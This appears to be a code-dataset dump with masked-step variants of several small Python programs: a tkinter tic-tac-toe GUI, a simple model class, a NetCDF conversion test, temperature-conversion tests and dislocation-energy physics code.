self.jogo.recebe_jogada(0,2)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player)) \n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',) \n def botão1x0_clicado(self):\n self.clicou(1,0)\n self.botão1x0.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(1,0)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n def botão1x1_clicado(self):\n self.clicou(1,1)\n self.botão1x1.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(1,1)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n def botão1x2_clicado(self):\n self.clicou(1,2)\n self.botão1x2.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(1,2)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',) \n def botão2x0_clicado(self):\n self.clicou(2,0)\n self.botão2x0.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(2,0)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n def botão2x1_clicado(self):\n self.clicou(2,1)\n self.botão2x1.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(2,1)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n def botão2x2_clicado(self):\n self.clicou(2,2)\n self.botão2x2.configure(text=self.jogo.player, state= \"disabled\", font='Arial 100 ')\n self.jogo.recebe_jogada(2,2)\n self.label_turno.configure(text=\"Turno de: {0}\" .format(self.jogo.player))\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n \n def iniciar(self):\n self.window.mainloop() \n############################################################################### \n def restart(self):\n self.jogo.limpa_jogadas()\n \n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky=\"nsew\")\n self.botão0x0.configure(command=self.botão0x0_clicado)\n \n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky=\"nsew\")\n self.botão0x1.configure(command=self.botão0x1_clicado)\n \n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky=\"nsew\")\n self.botão0x2.configure(command=self.botão0x2_clicado)\n \n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky=\"nsew\")\n self.botão1x0.configure(command=self.botão1x0_clicado)\n \n self.botão1x1 = tk.Button(self.window)\n self.botão1x1.grid(row=2, column=1, sticky=\"nsew\")\n self.botão1x1.configure(command=self.botão1x1_clicado)\n \n self.botão1x2 = tk.Button(self.window)\n self.botão1x2.grid(row=2, column=2, sticky=\"nsew\")\n self.botão1x2.configure(command=self.botão1x2_clicado)\n \n self.botão2x0 = tk.Button(self.window)\n self.botão2x0.grid(row=3, column=0, sticky=\"nsew\")\n self.botão2x0.configure(command=self.botão2x0_clicado)\n \n self.botão2x1 = tk.Button(self.window)\n self.botão2x1.grid(row=3, column=1, sticky=\"nsew\")\n self.botão2x1.configure(command=self.botão2x1_clicado)\n \n self.botão2x2 = tk.Button(self.window)\n self.botão2x2.grid(row=3, column=2, sticky=\"nsew\")\n self.botão2x2.configure(command=self.botão2x2_clicado)\n \n #Criando a Label dos turnos: \n self.label_turno = tk.Label(self.window)\n self.label_turno.grid(row=4, column=0, columnspan=1, sticky=\"nsew\")\n self.label_turno.configure(text=\"Turno de : {0}\" .format(self.jogo.player), bg='Black', fg='Green',font='Arial 9',)\n \n #Criando Botão de Reiniciar:\n self.reiniciar = tk.Button(self.window)\n self.reiniciar.grid(row=4, column=1,columnspan=1, sticky=\"nsew\")\n self.reiniciar.configure(text=\"Reiniciar\", font='Arial 24', activeforeground='Green', fg='Red', command=self.restart)\n \n self.label_ganhador = tk.Label(self.window)\n self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky=\"nsew\")\n self.label_ganhador.configure(text=\"Ganhador: {0}\" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)\n self.vitorias_X.configure(text=\"Vitórias de X: {0} \".format(self.jogo.vitórias_x), bg='Blue', fg='White')\n self.vitorias_O.configure(text=\"Vitórias de O: {0} \".format(self.jogo.vitórias_o), bg='Yellow', fg='Black') \n###############################################################################\n \njogodavelha = Tabuleiro()\njogodavelha.iniciar()\n",
"step-ids": [
9,
12,
15,
16,
18
]
}
|
[
9,
12,
15,
16,
18
] |
# Copyright (c) 2018, Raul Astudillo
import numpy as np
from copy import deepcopy
class BasicModel(object):
"""
Class for handling a very simple model that only requires saving the evaluated points (along with their corresponding outputs) so far.
"""
analytical_gradient_prediction = True
def __init__(self, output_dim=None, X=None, Y=None):
self.output_dim = output_dim
self.X = X
self.Y = Y
self.name = 'basic model'
def updateModel(self, X, Y):
"""
Updates the model with new observations.
"""
self.X = X
self.Y = Y
def get_X(self):
return np.copy(self.X)
def get_Y(self):
return deepcopy(self.Y)
def get_XY(self):
X = np.copy(self.X)
Y = deepcopy(self.Y)
return X, Y
def get_model_parameters(self):
"""
"""
pass
def get_model_parameters_names(self):
"""
"""
pass
|
normal
|
{
"blob_id": "88071df9367804b1c6e2b1c80da178ab7658e7a4",
"index": 3861,
"step-1": "<mask token>\n\n\nclass BasicModel(object):\n <mask token>\n <mask token>\n <mask token>\n\n def updateModel(self, X, Y):\n \"\"\"\n Updates the model with new observations.\n \"\"\"\n self.X = X\n self.Y = Y\n\n def get_X(self):\n return np.copy(self.X)\n\n def get_Y(self):\n return deepcopy(self.Y)\n\n def get_XY(self):\n X = np.copy(self.X)\n Y = deepcopy(self.Y)\n return X, Y\n\n def get_model_parameters(self):\n \"\"\"\n \"\"\"\n pass\n\n def get_model_parameters_names(self):\n \"\"\"\n \"\"\"\n pass\n",
"step-2": "<mask token>\n\n\nclass BasicModel(object):\n <mask token>\n <mask token>\n\n def __init__(self, output_dim=None, X=None, Y=None):\n self.output_dim = output_dim\n self.X = X\n self.Y = Y\n self.name = 'basic model'\n\n def updateModel(self, X, Y):\n \"\"\"\n Updates the model with new observations.\n \"\"\"\n self.X = X\n self.Y = Y\n\n def get_X(self):\n return np.copy(self.X)\n\n def get_Y(self):\n return deepcopy(self.Y)\n\n def get_XY(self):\n X = np.copy(self.X)\n Y = deepcopy(self.Y)\n return X, Y\n\n def get_model_parameters(self):\n \"\"\"\n \"\"\"\n pass\n\n def get_model_parameters_names(self):\n \"\"\"\n \"\"\"\n pass\n",
"step-3": "<mask token>\n\n\nclass BasicModel(object):\n <mask token>\n analytical_gradient_prediction = True\n\n def __init__(self, output_dim=None, X=None, Y=None):\n self.output_dim = output_dim\n self.X = X\n self.Y = Y\n self.name = 'basic model'\n\n def updateModel(self, X, Y):\n \"\"\"\n Updates the model with new observations.\n \"\"\"\n self.X = X\n self.Y = Y\n\n def get_X(self):\n return np.copy(self.X)\n\n def get_Y(self):\n return deepcopy(self.Y)\n\n def get_XY(self):\n X = np.copy(self.X)\n Y = deepcopy(self.Y)\n return X, Y\n\n def get_model_parameters(self):\n \"\"\"\n \"\"\"\n pass\n\n def get_model_parameters_names(self):\n \"\"\"\n \"\"\"\n pass\n",
"step-4": "<mask token>\n\n\nclass BasicModel(object):\n \"\"\"\n Class for handling a very simple model that only requires saving the evaluated points (along with their corresponding outputs) so far.\n \"\"\"\n analytical_gradient_prediction = True\n\n def __init__(self, output_dim=None, X=None, Y=None):\n self.output_dim = output_dim\n self.X = X\n self.Y = Y\n self.name = 'basic model'\n\n def updateModel(self, X, Y):\n \"\"\"\n Updates the model with new observations.\n \"\"\"\n self.X = X\n self.Y = Y\n\n def get_X(self):\n return np.copy(self.X)\n\n def get_Y(self):\n return deepcopy(self.Y)\n\n def get_XY(self):\n X = np.copy(self.X)\n Y = deepcopy(self.Y)\n return X, Y\n\n def get_model_parameters(self):\n \"\"\"\n \"\"\"\n pass\n\n def get_model_parameters_names(self):\n \"\"\"\n \"\"\"\n pass\n",
"step-5": "# Copyright (c) 2018, Raul Astudillo\n\nimport numpy as np\nfrom copy import deepcopy\n\nclass BasicModel(object):\n \"\"\"\n Class for handling a very simple model that only requires saving the evaluated points (along with their corresponding outputs) so far.\n \"\"\"\n analytical_gradient_prediction = True\n\n def __init__(self, output_dim=None, X=None, Y=None):\n self.output_dim = output_dim\n self.X = X\n self.Y = Y\n self.name = 'basic model'\n\n def updateModel(self, X, Y):\n \"\"\"\n Updates the model with new observations.\n \"\"\"\n self.X = X\n self.Y = Y\n\n def get_X(self):\n return np.copy(self.X)\n\n def get_Y(self):\n return deepcopy(self.Y)\n\n def get_XY(self):\n X = np.copy(self.X)\n Y = deepcopy(self.Y)\n return X, Y\n \n def get_model_parameters(self):\n \"\"\"\n \"\"\"\n pass\n\n def get_model_parameters_names(self):\n \"\"\"\n \"\"\"\n pass\n",
"step-ids": [
7,
8,
9,
10,
12
]
}
|
[
7,
8,
9,
10,
12
] |
import os
from .common import cached_outputs, data_files, test_outputs
import nappy.nc_interface.na_to_nc
import nappy.nc_interface.nc_to_na
def test_convert_nc_2010_to_na_2310():
ffi_in, ffi_out = (2010, 2310)
infile = os.path.join(cached_outputs, f"{ffi_in}.nc")
outfile = os.path.join(test_outputs, f"{ffi_out}_from_nc_{ffi_in}.na")
# Reading: infile
x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)
# Writing: outfile
x.writeNAFiles(outfile, delimiter=",", float_format="%g")
|
normal
|
{
"blob_id": "0de657ee173b606ad61d614a6168c00fcd571a70",
"index": 74,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_convert_nc_2010_to_na_2310():\n ffi_in, ffi_out = 2010, 2310\n infile = os.path.join(cached_outputs, f'{ffi_in}.nc')\n outfile = os.path.join(test_outputs, f'{ffi_out}_from_nc_{ffi_in}.na')\n x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)\n x.writeNAFiles(outfile, delimiter=',', float_format='%g')\n",
"step-3": "import os\nfrom .common import cached_outputs, data_files, test_outputs\nimport nappy.nc_interface.na_to_nc\nimport nappy.nc_interface.nc_to_na\n\n\ndef test_convert_nc_2010_to_na_2310():\n ffi_in, ffi_out = 2010, 2310\n infile = os.path.join(cached_outputs, f'{ffi_in}.nc')\n outfile = os.path.join(test_outputs, f'{ffi_out}_from_nc_{ffi_in}.na')\n x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)\n x.writeNAFiles(outfile, delimiter=',', float_format='%g')\n",
"step-4": "import os\n\nfrom .common import cached_outputs, data_files, test_outputs\n\nimport nappy.nc_interface.na_to_nc\nimport nappy.nc_interface.nc_to_na\n\n\ndef test_convert_nc_2010_to_na_2310():\n ffi_in, ffi_out = (2010, 2310)\n\n infile = os.path.join(cached_outputs, f\"{ffi_in}.nc\")\n outfile = os.path.join(test_outputs, f\"{ffi_out}_from_nc_{ffi_in}.na\")\n\n # Reading: infile\n x = nappy.nc_interface.nc_to_na.NCToNA(infile, requested_ffi=ffi_out)\n\n # Writing: outfile\n x.writeNAFiles(outfile, delimiter=\",\", float_format=\"%g\")\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
def DFS(x):
# 전위순회
if x > 7:
return
else:
DFS((x * 2))
print(x)
DFS((x*2)+1)
if __name__ == "__main__":
DFS(1)
|
normal
|
{
"blob_id": "1cc8695aa694359314b6d478fe6abed29fdc6c91",
"index": 3309,
"step-1": "<mask token>\n",
"step-2": "def DFS(x):\n if x > 7:\n return\n else:\n DFS(x * 2)\n print(x)\n DFS(x * 2 + 1)\n\n\n<mask token>\n",
"step-3": "def DFS(x):\n if x > 7:\n return\n else:\n DFS(x * 2)\n print(x)\n DFS(x * 2 + 1)\n\n\nif __name__ == '__main__':\n DFS(1)\n",
"step-4": "\ndef DFS(x):\n # 전위순회\n if x > 7:\n return\n else:\n \n DFS((x * 2))\n print(x)\n DFS((x*2)+1)\n\n \nif __name__ == \"__main__\":\n DFS(1)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from temp_conversion_script import convert_c_to_f
from temp_conversion_script import fever_detection
def test_convert_c_to_f():
answer = convert_c_to_f(20.0)
expected = 68.0
assert answer == expected
def test2():
answer = convert_c_to_f(-40.0)
expected = -40.0
assert answer == expected
def test_fever_detection():
temp_list = [93.0, 98.0, 100.0, 105.0, 101.0]
max_temp, is_fever = fever_detection(temp_list)
expected_max = 105.0
is_fever = True
assert max_temp == expected_max
|
normal
|
{
"blob_id": "d75187ed435c3d3aeeb31be4a0a4ed1754f8d160",
"index": 4436,
"step-1": "<mask token>\n\n\ndef test2():\n answer = convert_c_to_f(-40.0)\n expected = -40.0\n assert answer == expected\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_convert_c_to_f():\n answer = convert_c_to_f(20.0)\n expected = 68.0\n assert answer == expected\n\n\ndef test2():\n answer = convert_c_to_f(-40.0)\n expected = -40.0\n assert answer == expected\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef test_convert_c_to_f():\n answer = convert_c_to_f(20.0)\n expected = 68.0\n assert answer == expected\n\n\ndef test2():\n answer = convert_c_to_f(-40.0)\n expected = -40.0\n assert answer == expected\n\n\ndef test_fever_detection():\n temp_list = [93.0, 98.0, 100.0, 105.0, 101.0]\n max_temp, is_fever = fever_detection(temp_list)\n expected_max = 105.0\n is_fever = True\n assert max_temp == expected_max\n",
"step-4": "from temp_conversion_script import convert_c_to_f\nfrom temp_conversion_script import fever_detection\n\n\ndef test_convert_c_to_f():\n answer = convert_c_to_f(20.0)\n expected = 68.0\n assert answer == expected\n\n\ndef test2():\n answer = convert_c_to_f(-40.0)\n expected = -40.0\n assert answer == expected\n\n\ndef test_fever_detection():\n temp_list = [93.0, 98.0, 100.0, 105.0, 101.0]\n max_temp, is_fever = fever_detection(temp_list)\n expected_max = 105.0\n is_fever = True\n assert max_temp == expected_max\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
#str
owog="Delger"
# len()- urt
# lower()- jijigruuleh
# upper()- tomruulah
# capitalize()- ehnii useg tomruulah
# replace()- temdegt solih
print(owog.find("e"))
print(owog.count("e"))
print(owog[2:10])
a=21
b=21
if a>b:
print("a too ih")
elif a==b:
print("tentsuu")
else:
print("b too ih")
a, b = input().split()
for i in range(a, b+1):
print(i)
|
normal
|
{
"blob_id": "c4ca4b5c77c3c912b44a4853be30298ec845c4fd",
"index": 243,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(owog.find('e'))\nprint(owog.count('e'))\nprint(owog[2:10])\n<mask token>\nif a > b:\n print('a too ih')\nelif a == b:\n print('tentsuu')\nelse:\n print('b too ih')\n<mask token>\nfor i in range(a, b + 1):\n print(i)\n",
"step-3": "owog = 'Delger'\nprint(owog.find('e'))\nprint(owog.count('e'))\nprint(owog[2:10])\na = 21\nb = 21\nif a > b:\n print('a too ih')\nelif a == b:\n print('tentsuu')\nelse:\n print('b too ih')\na, b = input().split()\nfor i in range(a, b + 1):\n print(i)\n",
"step-4": "#str\r\nowog=\"Delger\"\r\n# len()- urt\r\n# lower()- jijigruuleh\r\n# upper()- tomruulah\r\n# capitalize()- ehnii useg tomruulah\r\n# replace()- temdegt solih\r\nprint(owog.find(\"e\"))\r\nprint(owog.count(\"e\"))\r\nprint(owog[2:10])\r\n\r\na=21\r\nb=21\r\nif a>b:\r\n print(\"a too ih\")\r\nelif a==b:\r\n print(\"tentsuu\")\r\nelse:\r\n print(\"b too ih\")\r\n\r\na, b = input().split()\r\nfor i in range(a, b+1):\r\n print(i)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
Various tools for cleaning out nulls and imputing
'''
|
normal
|
{
"blob_id": "bd310ab0bc193410b8f93ad5516b0731d2eba54f",
"index": 6268,
"step-1": "<mask token>\n",
"step-2": "'''\nVarious tools for cleaning out nulls and imputing \n'''\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
from numpy import pi,sqrt,cross,dot,zeros,linalg
from defs import *
##from numba import njit, prange
##
##@njit(parallel=True)
def engparallelb2(MU,NU,b1,b2,x1,x2,y1,y2,eta,a):
#For use in enginteract below
#HL p.154 Eq.(6-45)
b1x=b1[0]
b1y=b1[1]
b1z=b1[2]
b2x=b2[0]
b2y=b2[1]
b2z=b2[2]
Rab=Rp(x2,y2,eta,a)-Rp(x2,y1,eta,a)-Rp(x1,y2,eta,a)+Rp(x1,y1,eta,a)
#[b1',b2',x1,x2,y1,y2,eta,a,Rab]
#b1
ap=sqrt(eta**2+a**2)
Iab=Ia(x2,y2,1,ap)-Ia(x2,y1,1,ap)-Ia(x1,y2,1,ap)+Ia(x1,y1,1,ap)
Jab=Ja(x2,y2,1,ap)-Ja(x2,y1,1,ap)-Ja(x1,y2,1,ap)+Ja(x1,y1,1,ap)
return MU/4/pi*(b1x*b2x+(b1z*b2z+b1y*b2y)/(1-NU))*Iab \
+ MU/4/pi*(b1x*b2x)*(a**2/2)*Jab \
- MU/4/pi/(1-NU)*b1z*b2z*eta*eta*Jab
def engnonplanarb2(MU,NU,b1,b2,xi1,xi2,e3,costheta,x1,x2,y1,y2,z,a):
#For use in enginteract below
#
# ^ y axis
# /
# -
# y /
# / theta
# ---------------|----------------> x axis
# x
#
# x>0, y>0 HL p152, Eq.(6-33)
ap=sqrt(z*z+a*a)
Iab = Ia(x2,y2,costheta,ap)-Ia(x2,y1,costheta,ap)-Ia(x1,y2,costheta,ap)+Ia(x1,y1,costheta,ap)
Jab = Ja(x2,y2,costheta,ap)-Ja(x2,y1,costheta,ap)-Ja(x1,y2,costheta,ap)+Ja(x1,y1,costheta,ap)
Tab = ( Tfa(b1,b2,xi1,xi2,e3,costheta,x2,y2,z,a)
- Tfa(b1,b2,xi1,xi2,e3,costheta,x2,y1,z,a)
- Tfa(b1,b2,xi1,xi2,e3,costheta,x1,y2,z,a)
+ Tfa(b1,b2,xi1,xi2,e3,costheta,x1,y1,z,a) )
return ( MU/4/pi*(-2*dot(cross(b1,b2),cross(xi1,xi2))
+ dot(b1,xi1)*dot(b2,xi2) )*(Iab+a**2/2*Jab)
+ MU/4/pi/(1-NU)*Tab )
#When Iab incorporates Jab
#W = ( MU/4/pi* (-2*dot(cross(b1,b2),cross(xi1,xi2)) + dot(b1,xi1)*dot(b2,xi2) )*(Iab)
# + MU/4/pi/(1-NU)* Tab )
def enginteract(MU,NU,b1,b2,r1,r2,r3,r4,a):
#Computes interaction energy between two straight dislocation segments
#r1-r2 (Burgers vector b1) and r3-r4 (Burgers vector b2)
#MU is shear modulus, NU is Poisson ratio, a is core spread radius
r21=r2-r1
r43=r4-r3
r31=r3-r1
#Make sure that the segments are represented by column vectors
#if r21.shape[0]==1:
#r21=r21.T
#if r43.shape[0]==1:
#r43=r43.T
#if r31.shape[0]==1:
#r31=r31.T
#Segment line sense unit vectors
e1=r21/norm(r21)
e2=r43/norm(r43)
#Catagorise line segments according to whether they are parallel or not
e3=cross(e1,e2)
subzero=1e-10
if norm(e3)<subzero:
e2a=schmidt(r31,e1)
e3=cross(e1,e2a)
e3=e3/norm(e3)
eta=(dot(r3-r1,e2a)+dot(r4-r1,e2a))/2
x1=0
x2=dot(r2-r1,e1)
y1=dot(r3-r1,e1)
y2=dot(r4-r1,e1)
#engparallelb2 doesn't rotate b, it needs to be done here
b1n=zeros([3,1])
b2n=zeros([3,1])
b1n[0],b2n[0]=dot(b1,e1),dot(b2,e1)
b1n[1],b2n[1]=dot(b1,e2a),dot(b2,e2a)
b1n[2],b2n[2]=dot(b1,e3),dot(b2,e3)
return engparallelb2(MU,NU,b1n,b2n,x1,x2,y1,y2,eta,a)
else:
costheta=dot(e1,e2)
e3=e3/norm(e3)
e2a=cross(e3,e1)
z=dot(r31,e3)
z=-z
A=zeros([2,2])
A[0,0],A[0,1]=dot(r21,e1),-dot(r43,e1)
A[1,0],A[1,1]=dot(r21,e2a),-dot(r43,e2a)
rhs=zeros([2,1])
rhs[0],rhs[1]=dot(r31,e1),dot(r31,e2a)
t=linalg.solve(A,rhs)
r0=(1-t[0])*r1+t[0]*r2
x1=dot(r1-r0,e1)
x2=dot(r2-r0,e1)
y1=dot(r3-r0,e2)
y2=dot(r4-r0,e2)
return engnonplanarb2(MU,NU,b1,b2,e1,e2,e3,costheta,x1,x2,y1,y2,z,a)
|
normal
|
{
"blob_id": "2611d7dd364f6a027da29c005754ac2465faa8be",
"index": 8667,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef engparallelb2(MU, NU, b1, b2, x1, x2, y1, y2, eta, a):\n b1x = b1[0]\n b1y = b1[1]\n b1z = b1[2]\n b2x = b2[0]\n b2y = b2[1]\n b2z = b2[2]\n Rab = Rp(x2, y2, eta, a) - Rp(x2, y1, eta, a) - Rp(x1, y2, eta, a) + Rp(x1,\n y1, eta, a)\n ap = sqrt(eta ** 2 + a ** 2)\n Iab = Ia(x2, y2, 1, ap) - Ia(x2, y1, 1, ap) - Ia(x1, y2, 1, ap) + Ia(x1,\n y1, 1, ap)\n Jab = Ja(x2, y2, 1, ap) - Ja(x2, y1, 1, ap) - Ja(x1, y2, 1, ap) + Ja(x1,\n y1, 1, ap)\n return MU / 4 / pi * (b1x * b2x + (b1z * b2z + b1y * b2y) / (1 - NU)\n ) * Iab + MU / 4 / pi * (b1x * b2x) * (a ** 2 / 2\n ) * Jab - MU / 4 / pi / (1 - NU) * b1z * b2z * eta * eta * Jab\n\n\n<mask token>\n\n\ndef enginteract(MU, NU, b1, b2, r1, r2, r3, r4, a):\n r21 = r2 - r1\n r43 = r4 - r3\n r31 = r3 - r1\n e1 = r21 / norm(r21)\n e2 = r43 / norm(r43)\n e3 = cross(e1, e2)\n subzero = 1e-10\n if norm(e3) < subzero:\n e2a = schmidt(r31, e1)\n e3 = cross(e1, e2a)\n e3 = e3 / norm(e3)\n eta = (dot(r3 - r1, e2a) + dot(r4 - r1, e2a)) / 2\n x1 = 0\n x2 = dot(r2 - r1, e1)\n y1 = dot(r3 - r1, e1)\n y2 = dot(r4 - r1, e1)\n b1n = zeros([3, 1])\n b2n = zeros([3, 1])\n b1n[0], b2n[0] = dot(b1, e1), dot(b2, e1)\n b1n[1], b2n[1] = dot(b1, e2a), dot(b2, e2a)\n b1n[2], b2n[2] = dot(b1, e3), dot(b2, e3)\n return engparallelb2(MU, NU, b1n, b2n, x1, x2, y1, y2, eta, a)\n else:\n costheta = dot(e1, e2)\n e3 = e3 / norm(e3)\n e2a = cross(e3, e1)\n z = dot(r31, e3)\n z = -z\n A = zeros([2, 2])\n A[0, 0], A[0, 1] = dot(r21, e1), -dot(r43, e1)\n A[1, 0], A[1, 1] = dot(r21, e2a), -dot(r43, e2a)\n rhs = zeros([2, 1])\n rhs[0], rhs[1] = dot(r31, e1), dot(r31, e2a)\n t = linalg.solve(A, rhs)\n r0 = (1 - t[0]) * r1 + t[0] * r2\n x1 = dot(r1 - r0, e1)\n x2 = dot(r2 - r0, e1)\n y1 = dot(r3 - r0, e2)\n y2 = dot(r4 - r0, e2)\n return engnonplanarb2(MU, NU, b1, b2, e1, e2, e3, costheta, x1, x2,\n y1, y2, z, a)\n",
"step-3": "<mask token>\n\n\ndef engparallelb2(MU, NU, b1, b2, x1, x2, y1, y2, eta, a):\n b1x = b1[0]\n b1y = b1[1]\n b1z = b1[2]\n b2x = b2[0]\n b2y = b2[1]\n b2z = b2[2]\n Rab = Rp(x2, y2, eta, a) - Rp(x2, y1, eta, a) - Rp(x1, y2, eta, a) + Rp(x1,\n y1, eta, a)\n ap = sqrt(eta ** 2 + a ** 2)\n Iab = Ia(x2, y2, 1, ap) - Ia(x2, y1, 1, ap) - Ia(x1, y2, 1, ap) + Ia(x1,\n y1, 1, ap)\n Jab = Ja(x2, y2, 1, ap) - Ja(x2, y1, 1, ap) - Ja(x1, y2, 1, ap) + Ja(x1,\n y1, 1, ap)\n return MU / 4 / pi * (b1x * b2x + (b1z * b2z + b1y * b2y) / (1 - NU)\n ) * Iab + MU / 4 / pi * (b1x * b2x) * (a ** 2 / 2\n ) * Jab - MU / 4 / pi / (1 - NU) * b1z * b2z * eta * eta * Jab\n\n\ndef engnonplanarb2(MU, NU, b1, b2, xi1, xi2, e3, costheta, x1, x2, y1, y2, z, a\n ):\n ap = sqrt(z * z + a * a)\n Iab = Ia(x2, y2, costheta, ap) - Ia(x2, y1, costheta, ap) - Ia(x1, y2,\n costheta, ap) + Ia(x1, y1, costheta, ap)\n Jab = Ja(x2, y2, costheta, ap) - Ja(x2, y1, costheta, ap) - Ja(x1, y2,\n costheta, ap) + Ja(x1, y1, costheta, ap)\n Tab = Tfa(b1, b2, xi1, xi2, e3, costheta, x2, y2, z, a) - Tfa(b1, b2,\n xi1, xi2, e3, costheta, x2, y1, z, a) - Tfa(b1, b2, xi1, xi2, e3,\n costheta, x1, y2, z, a) + Tfa(b1, b2, xi1, xi2, e3, costheta, x1,\n y1, z, a)\n return MU / 4 / pi * (-2 * dot(cross(b1, b2), cross(xi1, xi2)) + dot(b1,\n xi1) * dot(b2, xi2)) * (Iab + a ** 2 / 2 * Jab) + MU / 4 / pi / (1 - NU\n ) * Tab\n\n\ndef enginteract(MU, NU, b1, b2, r1, r2, r3, r4, a):\n r21 = r2 - r1\n r43 = r4 - r3\n r31 = r3 - r1\n e1 = r21 / norm(r21)\n e2 = r43 / norm(r43)\n e3 = cross(e1, e2)\n subzero = 1e-10\n if norm(e3) < subzero:\n e2a = schmidt(r31, e1)\n e3 = cross(e1, e2a)\n e3 = e3 / norm(e3)\n eta = (dot(r3 - r1, e2a) + dot(r4 - r1, e2a)) / 2\n x1 = 0\n x2 = dot(r2 - r1, e1)\n y1 = dot(r3 - r1, e1)\n y2 = dot(r4 - r1, e1)\n b1n = zeros([3, 1])\n b2n = zeros([3, 1])\n b1n[0], b2n[0] = dot(b1, e1), dot(b2, e1)\n b1n[1], b2n[1] = dot(b1, e2a), dot(b2, e2a)\n b1n[2], b2n[2] = dot(b1, e3), dot(b2, e3)\n return engparallelb2(MU, NU, b1n, b2n, x1, x2, y1, y2, eta, a)\n else:\n costheta = dot(e1, e2)\n e3 = e3 / norm(e3)\n e2a = cross(e3, e1)\n z = dot(r31, e3)\n z = -z\n A = zeros([2, 2])\n A[0, 0], A[0, 1] = dot(r21, e1), -dot(r43, e1)\n A[1, 0], A[1, 1] = dot(r21, e2a), -dot(r43, e2a)\n rhs = zeros([2, 1])\n rhs[0], rhs[1] = dot(r31, e1), dot(r31, e2a)\n t = linalg.solve(A, rhs)\n r0 = (1 - t[0]) * r1 + t[0] * r2\n x1 = dot(r1 - r0, e1)\n x2 = dot(r2 - r0, e1)\n y1 = dot(r3 - r0, e2)\n y2 = dot(r4 - r0, e2)\n return engnonplanarb2(MU, NU, b1, b2, e1, e2, e3, costheta, x1, x2,\n y1, y2, z, a)\n",
"step-4": "from numpy import pi, sqrt, cross, dot, zeros, linalg\nfrom defs import *\n\n\ndef engparallelb2(MU, NU, b1, b2, x1, x2, y1, y2, eta, a):\n b1x = b1[0]\n b1y = b1[1]\n b1z = b1[2]\n b2x = b2[0]\n b2y = b2[1]\n b2z = b2[2]\n Rab = Rp(x2, y2, eta, a) - Rp(x2, y1, eta, a) - Rp(x1, y2, eta, a) + Rp(x1,\n y1, eta, a)\n ap = sqrt(eta ** 2 + a ** 2)\n Iab = Ia(x2, y2, 1, ap) - Ia(x2, y1, 1, ap) - Ia(x1, y2, 1, ap) + Ia(x1,\n y1, 1, ap)\n Jab = Ja(x2, y2, 1, ap) - Ja(x2, y1, 1, ap) - Ja(x1, y2, 1, ap) + Ja(x1,\n y1, 1, ap)\n return MU / 4 / pi * (b1x * b2x + (b1z * b2z + b1y * b2y) / (1 - NU)\n ) * Iab + MU / 4 / pi * (b1x * b2x) * (a ** 2 / 2\n ) * Jab - MU / 4 / pi / (1 - NU) * b1z * b2z * eta * eta * Jab\n\n\ndef engnonplanarb2(MU, NU, b1, b2, xi1, xi2, e3, costheta, x1, x2, y1, y2, z, a\n ):\n ap = sqrt(z * z + a * a)\n Iab = Ia(x2, y2, costheta, ap) - Ia(x2, y1, costheta, ap) - Ia(x1, y2,\n costheta, ap) + Ia(x1, y1, costheta, ap)\n Jab = Ja(x2, y2, costheta, ap) - Ja(x2, y1, costheta, ap) - Ja(x1, y2,\n costheta, ap) + Ja(x1, y1, costheta, ap)\n Tab = Tfa(b1, b2, xi1, xi2, e3, costheta, x2, y2, z, a) - Tfa(b1, b2,\n xi1, xi2, e3, costheta, x2, y1, z, a) - Tfa(b1, b2, xi1, xi2, e3,\n costheta, x1, y2, z, a) + Tfa(b1, b2, xi1, xi2, e3, costheta, x1,\n y1, z, a)\n return MU / 4 / pi * (-2 * 